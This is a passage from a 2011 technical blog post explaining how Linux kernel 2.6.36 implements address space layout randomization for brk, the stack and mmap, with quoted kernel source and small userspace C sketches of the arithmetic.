It calculates the end of the randomization range by adding 0x02000000 (32 MB) to the current ‘brk’ address and then calls randomize_range() to pick a random address within that range. If randomize_range() returns 0, the original ‘mm->brk’ is used instead. This randomization routine is also placed in drivers/char/random.c and you can see it here:

/*
 * randomize_range() returns a start address such that
 *
 *    [...... <range> .....]
 *  start                  end
 *
 * a <range> with size "len" starting at the return value is inside in the
 * area defined by [start, end], but is otherwise randomized.
 */
unsigned long
randomize_range(unsigned long start, unsigned long end, unsigned long len)
{
        unsigned long range = end - len - start;

        if (end <= start + len)
                return 0;
        return PAGE_ALIGN(get_random_int() % range + start);
}

If the range is valid, it will invoke get_random_int(), reduce the result modulo the size of the range, and add the starting address. The resulting value is then aligned to the next page boundary, as defined by the ‘PAGE_SIZE’ constant.
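
The arithmetic can be reproduced in user space to get a feeling for the resulting addresses. In the sketch below the random word is passed in as a parameter so the result is repeatable, and a 4096-byte page is assumed; the MODEL_ macros and the _model function names are inventions of this example.

```c
/* Assumption: 4 KB pages, as on a typical x86 configuration. */
#define MODEL_PAGE_SIZE 4096UL
#define MODEL_PAGE_ALIGN(a) \
    (((a) + MODEL_PAGE_SIZE - 1) & ~(MODEL_PAGE_SIZE - 1))

/* Same arithmetic as randomize_range(), with the random word supplied
 * by the caller as `rnd` instead of get_random_int(). */
unsigned long randomize_range_model(unsigned long start, unsigned long end,
                                    unsigned long len, unsigned int rnd)
{
    unsigned long range = end - len - start;

    if (end <= start + len)
        return 0;                   /* no room for the requested range */
    return MODEL_PAGE_ALIGN(rnd % range + start);
}

/* Counterpart of arch_randomize_brk(): up to 32 MB above `brk`,
 * falling back to `brk` itself when the range helper returns 0. */
unsigned long randomize_brk_model(unsigned long brk, unsigned int rnd)
{
    unsigned long r = randomize_range_model(brk, brk + 0x02000000UL, 0, rnd);

    return r ? r : brk;
}
```

Since the result is page aligned and the window is 0x02000000 bytes wide, there are at most 8192 possible positions with 4 KB pages, i.e. about 13 bits of randomness for brk.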

SYSCTL Interface
In the previous section we encountered a variable named ‘randomize_va_space’. As almost any Linux administrator knows, the Linux ASLR can be tuned using the ‘/proc/sys/kernel/randomize_va_space’ file or the ‘kernel.randomize_va_space’ SYSCTL variable. In both cases the result is an integer value being passed to the kernel, as we can read at kernel/sysctl.c which is where this is defined.

static struct ctl_table kern_table[] = {
  ...
#if defined(CONFIG_MMU)
        {
                .procname       = "randomize_va_space",
                .data           = &randomize_va_space,
                .maxlen         = sizeof(int),
                .mode           = 0644,
                .proc_handler   = proc_dointvec,
        },
#endif
  ...
/*
 * NOTE: do not add new entries to this table unless you have read
 * Documentation/sysctl/ctl_unnumbered.txt
 */
        { }
};

The actual variable ‘randomize_va_space’ is placed in mm/memory.c as shown below.

/*
 * Randomize the address space (stacks, mmaps, brk, etc.).
 *
 * ( When CONFIG_COMPAT_BRK=y we exclude brk from randomization,
 *   as ancient (libc5 based) binaries can segfault. )
 */
int randomize_va_space __read_mostly =
#ifdef CONFIG_COMPAT_BRK
                                        1;
#else
                                        2;
#endif

Here, the ‘__read_mostly’ modifier is an architecture specific attribute which, in the case of x86 processors, is defined in the arch/x86/include/asm/cache.h header file.

#define __read_mostly __attribute__((__section__(".data..read_mostly")))

This forces the variable to be placed in a section called .data..read_mostly that is designed for static variables which are initialized once and very rarely changed.
From the kernel developers’ comment we can also see that if the compatibility support option for the brk(2) system call (‘CONFIG_COMPAT_BRK’) is enabled, brk will not be randomized by default since this could break old versions of the C library. Additionally, this variable is registered in SYSCTL’s binary kernel table as we can find in the kernel/sysctl_binary.c file.

static const struct bin_table bin_kern_table[] = {
  ...
        { CTL_INT,      KERN_RANDOMIZE,                 "randomize_va_space" },
  ...
        {}
};

This entry uses the ‘KERN_RANDOMIZE’ value, which is defined in the include/linux/sysctl.h header file.

/* CTL_KERN names: */
enum
{
  ...
        KERN_RANDOMIZE=68, /* int: randomize virtual address space */
  ...
};
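From the userspace side, the integer exported by the above table entry can simply be read back from procfs. The following is a small sketch of that, not anything taken from the kernel tree: the function names are made up for this post, and the descriptions of values 0, 1 and 2 are my summary of how the variable is used in the code discussed here (non-zero enables randomization, brk is only randomized when the value is greater than 1).

```c
#include <stdio.h>

/* Map the integer stored in randomize_va_space to a short description. */
const char *aslr_mode_name(int value)
{
        switch (value) {
        case 0:
                return "disabled";
        case 1:
                return "enabled, brk not randomized";
        case 2:
                return "enabled, brk randomized too";
        default:
                return "unknown";
        }
}

/*
 * Read the current setting from the given procfs path.
 * Returns the integer value, or -1 if the file cannot be opened or parsed.
 */
int read_randomize_va_space(const char *path)
{
        FILE *fp = fopen(path, "r");
        int value = -1;

        if (fp == NULL)
                return -1;
        if (fscanf(fp, "%d", &value) != 1)
                value = -1;
        fclose(fp);
        return value;
}
```

A caller would typically do something like aslr_mode_name(read_randomize_va_space("/proc/sys/kernel/randomize_va_space")) and print the result. Writing a new value works the same way in the other direction, but requires root since the entry’s mode is 0644.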

Now that we have a basic understanding of what is going on in the kernel when manipulating that variable through SYSCTL interface, we can move to the more interesting parts…

Stack Randomization
The actual stack randomization takes place in fs/exec.c and more specifically in the setup_arg_pages() routine which is responsible for the final stage of stack initialization before executing a binary. Here is a code snippet that demonstrates how the stack randomization is implemented…

/*
 * Finalizes the stack vm_area_struct. The flags and permissions are updated,
 * the stack is optionally relocated, and some extra space is added.
 */
int setup_arg_pages(struct linux_binprm *bprm,
                    unsigned long stack_top,
                    int executable_stack)
{
  ...
#ifdef CONFIG_STACK_GROWSUP
  ...
#else
        stack_top = arch_align_stack(stack_top);
        stack_top = PAGE_ALIGN(stack_top);
  ...
out_unlock:
        up_write(&mm->mmap_sem);
        return ret;
}

If the stack segment does not grow upwards, it will call arch_align_stack(), passing the stack top address which was an argument of the setup_arg_pages() routine. Then it will align the returned value to a page boundary and continue with the stack segment setup. Assuming that we’re dealing with an x86 architecture, the initial function call will lead to the arch/x86/kernel/process.c file where we can find the following code.

unsigned long arch_align_stack(unsigned long sp)
{
        if (!(current->personality & ADDR_NO_RANDOMIZE) && randomize_va_space)
                sp -= get_random_int() % 8192;
        return sp & ~0xf;
}

The check is fairly simple. If the currently executed task doesn’t have ‘ADDR_NO_RANDOMIZE’ personality set which is used to disable the randomization and the ‘randomize_va_space’ has a non-zero value, it will invoke get_random_int() to perform the stack randomization. Before moving on, for completeness here is the include/linux/personality.h header file’s definition of the above personality constant value.

/*
 * Flags for bug emulation.
 *
 * These occupy the top three bytes.
 */
enum {
        ADDR_NO_RANDOMIZE =     0x0040000,      /* disable randomization of VA space */
  ...
};
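As a quick aside, the arithmetic of arch_align_stack() together with the personality check can be tried out in userspace. This is only a sketch under a few assumptions: the SKETCH_ADDR_NO_RANDOMIZE macro and the function name are mine, and the personality, the ‘randomize_va_space’ value and the random number are passed in as plain parameters instead of being read from the current task and get_random_int().

```c
/* Same value as ADDR_NO_RANDOMIZE in include/linux/personality.h. */
#define SKETCH_ADDR_NO_RANDOMIZE 0x0040000UL

/*
 * Userspace copy of the arch_align_stack() arithmetic. All inputs that the
 * kernel takes from global state are hypothetical parameters here.
 */
unsigned long align_stack_sketch(unsigned long sp, unsigned long personality,
                                 int randomize_va_space, unsigned int rnd)
{
        if (!(personality & SKETCH_ADDR_NO_RANDOMIZE) && randomize_va_space)
                sp -= rnd % 8192;       /* move down by 0 to 8191 bytes */
        return sp & ~0xfUL;             /* round down to a 16-byte boundary */
}
```

For instance, align_stack_sketch(0xbffff000, 0, 2, 8193) moves the pointer down by 1 byte (8193 % 8192) and then rounds it down to 0xbfffeff0, while passing SKETCH_ADDR_NO_RANDOMIZE as the personality only performs the 16-byte alignment.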

Back to arch_align_stack(), after decrementing the stack pointer by a random amount (at most 8191 bytes) in case of an ASLR supported task, it’ll align it to a 16-byte boundary by masking it with 0xfffffff0 on 32-bit processors. However, a quick look in fs/binfmt_elf.c shows that this is not that simple since this is how it’s implemented in the ELF loader’s code…

static int load_elf_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
        struct file *interpreter = NULL; /* to shut gcc up */
  ...
        /* Do this so that we can load the interpreter, if need be.  We will
           change some of these later */
        current->mm->free_area_cache = current->mm->mmap_base;
        current->mm->cached_hole_size = 0;
        retval = setup_arg_pages(bprm, randomize_stack_top(STACK_TOP),
                                 executable_stack);
  ...
        goto out;
}

We can see here that it passes a randomized stack top pointer using the randomize_stack_top() routine from the same source code file.

#ifndef STACK_RND_MASK
#define STACK_RND_MASK (0x7ff >> (PAGE_SHIFT - 12))     /* 8MB of VA */
#endif

static unsigned long randomize_stack_top(unsigned long stack_top)
{
        unsigned int random_variable = 0;

        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                random_variable = get_random_int() & STACK_RND_MASK;
                random_variable <<= PAGE_SHIFT;
        }
#ifdef CONFIG_STACK_GROWSUP
        return PAGE_ALIGN(stack_top) + random_variable;
#else
        return PAGE_ALIGN(stack_top) - random_variable;
#endif
}

Once again, the current process won’t be randomized if it doesn’t have the ‘PF_RANDOMIZE’ flag or if it has the ‘ADDR_NO_RANDOMIZE’ personality set. Otherwise, it will call get_random_int() and mask the returned integer with ‘STACK_RND_MASK’, which gives a random number of pages that is then converted to bytes by shifting it left by ‘PAGE_SHIFT’. Although you see a definition of the latter constant in the given code snippet, that one is only a fallback (note the #ifndef). For x86 it is defined in the architecture specific arch/x86/include/asm/elf.h header file.

#ifdef CONFIG_X86_32

#define STACK_RND_MASK (0x7ff)

This is pretty much the stack ASLR implementation of Linux.
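To put some numbers on it, here is a minimal userspace sketch of the randomize_stack_top() calculation for the non-CONFIG_STACK_GROWSUP case. As before this is an illustration and not kernel code: the SKETCH_* names are made up, 4 KiB pages and the 32-bit x86 mask of 0x7ff are assumed, and the random number and the outcome of the flag checks are passed in as the hypothetical ‘rnd’ and ‘randomize’ parameters.

```c
/* Userspace stand-ins, assuming 4 KiB pages and the x86-32 stack mask. */
#define SKETCH_PAGE_SHIFT 12
#define SKETCH_PAGE_SIZE (1UL << SKETCH_PAGE_SHIFT)
#define SKETCH_PAGE_ALIGN(addr) \
        (((addr) + SKETCH_PAGE_SIZE - 1) & ~(SKETCH_PAGE_SIZE - 1))
#define SKETCH_STACK_RND_MASK 0x7ffU

/*
 * Same arithmetic as randomize_stack_top() for a downward growing stack.
 * 'randomize' stands for "PF_RANDOMIZE set and ADDR_NO_RANDOMIZE not set".
 */
unsigned long randomize_stack_top_sketch(unsigned long stack_top,
                                         unsigned int rnd, int randomize)
{
        unsigned int random_variable = 0;

        if (randomize) {
                random_variable = rnd & SKETCH_STACK_RND_MASK; /* 0..2047 pages */
                random_variable <<= SKETCH_PAGE_SHIFT;         /* pages to bytes */
        }
        return SKETCH_PAGE_ALIGN(stack_top) - random_variable;
}
```

With a stack top of 0xc0000000 the lowest possible result is 0xbf801000, which is 0x7ff pages (just under 8 MB) below the unrandomized address. In other words, this step contributes 11 bits of page-granular randomness on 32-bit x86.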

mmap(2) Randomization
Before we dive into the mmap(2) randomization itself, what happens with mmap(2) allocations colliding with the randomized stack space?
So, to avoid such collisions with the stack randomized virtual address space, Linux kernel developers implemented the following routine in arch/x86/mm/mmap.c file.

static unsigned int stack_maxrandom_size(void)
{
        unsigned int max = 0;
        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
        }

        return max;
}


/*
 * Top of mmap area (just below the process stack).
 *
 * Leave an at least ~128 MB hole with possible stack randomization.
 */
#define MIN_GAP (128*1024*1024UL + stack_maxrandom_size())
#define MAX_GAP (TASK_SIZE/6*5)

After performing the usual checks on the currently executing task, it calculates the maximum size (in bytes) of the stack randomization based on the ‘STACK_RND_MASK’ value. Later on, inside mmap_base() we can see how the above C macros are used to ensure that the mmap area doesn’t collide with the randomized stack space.

static unsigned long mmap_base(void)
{
        unsigned long gap = rlimit(RLIMIT_STACK);

        if (gap < MIN_GAP)
                gap = MIN_GAP;
        else if (gap > MAX_GAP)
                gap = MAX_GAP;

        return PAGE_ALIGN(TASK_SIZE - gap - mmap_rnd());
}

Here is also our first contact with the mmap(2) randomization routine which is, of course, mmap_rnd(). This one is also placed in arch/x86/mm/mmap.c and its code is this:

static unsigned long mmap_rnd(void)
{
        unsigned long rnd = 0;

       /*
        *  8 bits of randomness in 32bit mmaps, 20 address space bits
        * 28 bits of randomness in 64bit mmaps, 40 address space bits
        */
        if (current->flags & PF_RANDOMIZE) {
                if (mmap_is_ia32())
                        rnd = (long)get_random_int() % (1<<8);
                else
                        rnd = (long)(get_random_int() % (1<<28));
        }
        return rnd << PAGE_SHIFT;
}

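This code is pretty self-explanatory. If the ‘PF_RANDOMIZE’ flag is set, it picks a random number of pages (less than 2^8 for 32-bit mmaps, less than 2^28 for 64-bit ones) and converts it to a byte offset by shifting it left by ‘PAGE_SHIFT’. Otherwise, it returns zero.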
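Putting the pieces of this section together, the following userspace sketch computes the mmap base for a 32-bit task. It makes several assumptions that are not part of the kernel code above: a TASK_SIZE of 0xc0000000 (the common 3 GB user space split), 4 KiB pages, the random number passed in as ‘rnd’, and a single ‘randomize’ parameter standing in for the flag and personality checks that stack_maxrandom_size() and mmap_rnd() perform separately. All the SKETCH_* and *_sketch names are made up.

```c
/* Userspace stand-ins, assuming 4 KiB pages and a 3 GB user address space. */
#define SKETCH_PAGE_SHIFT 12
#define SKETCH_PAGE_SIZE (1UL << SKETCH_PAGE_SHIFT)
#define SKETCH_PAGE_ALIGN(addr) \
        (((addr) + SKETCH_PAGE_SIZE - 1) & ~(SKETCH_PAGE_SIZE - 1))
#define SKETCH_TASK_SIZE 0xc0000000UL
#define SKETCH_STACK_RND_MASK_UL 0x7ffUL

/*
 * Combines stack_maxrandom_size(), mmap_rnd() (32-bit branch) and
 * mmap_base(). 'stack_rlimit' plays the role of rlimit(RLIMIT_STACK).
 */
unsigned long mmap_base_sketch(unsigned long stack_rlimit, unsigned int rnd,
                               int randomize)
{
        /* worst-case stack randomization that the gap has to absorb */
        unsigned long max_stack_rnd =
                randomize ? (SKETCH_STACK_RND_MASK_UL << SKETCH_PAGE_SHIFT) : 0;
        unsigned long min_gap = 128UL * 1024 * 1024 + max_stack_rnd;
        unsigned long max_gap = SKETCH_TASK_SIZE / 6 * 5;
        /* 8 bits of page-granular randomness, as in the ia32 branch */
        unsigned long mmap_rnd =
                randomize ? ((unsigned long)(rnd % (1U << 8)) << SKETCH_PAGE_SHIFT) : 0;
        unsigned long gap = stack_rlimit;

        if (gap < min_gap)
                gap = min_gap;
        else if (gap > max_gap)
                gap = max_gap;

        return SKETCH_PAGE_ALIGN(SKETCH_TASK_SIZE - gap - mmap_rnd);
}
```

With the usual 8 MB stack limit and no randomization this gives 0xb8000000. With randomization enabled the base starts at 0xb7801000 (the gap grows by the maximum stack randomization) and moves down by up to 255 more pages depending on ‘rnd’, so the lowest value is 0xb7702000.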

So, I believe this post should give readers a grasp of how Linux ASLR is implemented. I used version 2.6.36 of the Linux kernel, so this might not apply to future releases, but for now it is up to date. Any comments, corrections or suggestions are always welcome.

Written by xorl

January 16, 2011 at 21:09

Posted in linux, security